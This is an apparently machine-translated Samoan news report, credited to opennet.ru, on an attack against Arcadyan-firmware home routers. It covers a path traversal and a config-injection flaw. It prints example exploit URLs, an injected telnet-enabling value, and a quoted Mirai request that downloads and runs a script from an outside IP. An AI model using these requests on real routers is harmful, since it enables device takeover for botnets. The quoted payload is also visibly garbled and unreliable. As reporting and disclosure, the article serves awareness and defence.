O se osofaʻiga tele na faʻamauina i luga o le upega tafaʻilagi e faasaga i tagata taʻavale fale o loʻo faʻaogaina e le firmware se faʻatinoga HTTP server mai le kamupani Arcadyan. Ina ia maua le pule i luga o masini, e faʻaaogaina se tuʻufaʻatasiga o faʻafitauli e lua e faʻatagaina ai le faʻatinoina mamao o le tulafono faʻamaonia ma aia tatau. O le faʻafitauli e aʻafia ai le lautele o ADSL routers mai Arcadyan, ASUS ma Pafalo, faʻapea foʻi ma masini e tuʻuina atu i lalo ole Beeline brands (o le faʻafitauli e faʻamaonia ile Smart Box Flash), Deutsche Telekom, Orange, O2, Telus, Verizon, Vodafone ma isi kamupani telefoni. O loʻo maitauina o le faʻafitauli o loʻo i ai i le Arcadyan firmware mo le sili atu i le 10 tausaga ma i le taimi lea ua mafai ona faimalaga atu i le itiiti ifo ma le 20 masini faʻataʻitaʻiga mai 17 gaosiga eseese.
O le fa'aletonu muamua, CVE-2021-20090, e mafai ai ona maua so'o se fa'amatalaga fa'aoga i luga ole laiga e aunoa ma le fa'amaoni. O le ute o le faʻafitauli o le i totonu o le upega tafaʻilagi, o nisi o faʻatonuga e ala i ai ata, faila CSS ma faʻamaumauga JavaScript e mafai ona maua e aunoa ma le faʻamaonia. I lenei tulaga, o faʻamaumauga e faʻatagaina ai le avanoa e aunoa ma le faʻamaoniaina o loʻo faʻamaonia e faʻaaoga ai le masini muamua. O le fa'amaotiina o “../” mataitusi i ala e alu i le fa'asinomaga matua e poloka e le firmware, ae fa'aaoga le "..%2f" tu'ufa'atasi ua misi. O le mea lea, e mafai ona tatala itulau puipuia pe a lafoina talosaga e pei o le "http://192.168.1.1/images/..%2findex.htm".
O le faʻafitauli lona lua, CVE-2021-20091, faʻatagaina se tagata faʻamaonia e faia suiga i le faʻaogaina o le masini e ala i le tuʻuina atu o faʻasologa faʻapitoa faʻapipiʻiina i le tusi apply_abstract.cgi, lea e le siakiina le i ai o se uiga fou i totonu o faʻamau. . Mo se faʻataʻitaʻiga, pe a faia se ping operation, e mafai e le tagata osofaʻi ona faʻamaonia le tau "192.168.1.2%0AARC_SYS_TelnetdEnable = 1" i le fanua ma le tuatusi IP o loʻo siakiina, ma le tusitusiga, pe a fatuina le faila faila /tmp/etc/config/ .glbcfg, o le a tusia le laina "AARC_SYS_TelnetdEnable=1" i totonu ", lea e faʻagaoioia ai le telnetd server, lea e tuʻuina atu ai le faʻaogaina o le atigi faʻatonuina ma aia tatau. E faʻapea foʻi, e ala i le faʻatulagaina o le AARC_SYS parakalafa, e mafai ona e faʻatinoina soʻo se code i luga ole faiga. O le fa'aletonu muamua e mafai ai ona fa'agasolo se fa'amatalaga fa'afitauli e aunoa ma le fa'amaoni e ala i le fa'aogaina o le "/images/..%2fapply_abstract.cgi".
Ina ia faʻaogaina faʻafitauli, e tatau i se tagata osofaʻi ona mafai ona tuʻuina atu se talosaga i le taulaga fesoʻotaʻiga o loʻo faʻaogaina ai le upega tafaʻilagi. I le faʻamasinoina o le malosi o le faʻasalalauina o le osofaʻiga, o le tele o tagata faʻatautaia e tuʻuina avanoa i luga oa latou masini mai le fesoʻotaʻiga i fafo e faʻafaigofie ai le suʻesuʻeina o faʻafitauli e le auaunaga lagolago. Afai e faʻatapulaʻaina le avanoa i le atinaʻe i totonu o fesoʻotaʻiga i totonu, e mafai ona faia se osofaʻiga mai se fesoʻotaiga i fafo e faʻaaoga ai le "DNS rebinding" technique. O lo'o fa'aaogaina fa'aletonu e fa'afeso'ota'i ai le 'auala i le Mirai botnet: POST /images/..%2fapply_abstract.cgi HTTP/1.1 Feso'ota'iga: tapuni Tagata-Agent: Dark action=start_ping&submit_button=ping.html& action_params=blink_time%3D5&ARC_212.192.241.7_ipaddress. 0%1A ARC_SYS_TelnetdEnable=0& %212.192.241.72AARC_SYS_=cd+/tmp; wget+http://212.192.241.72/lolol.sh; curl+-O+http://777/lolol.sh; chmod+0+lolol.sh; sh+lolol.sh&ARC_ping_status=4&TMP_Ping_Type=XNUMX
puna: opennet.ru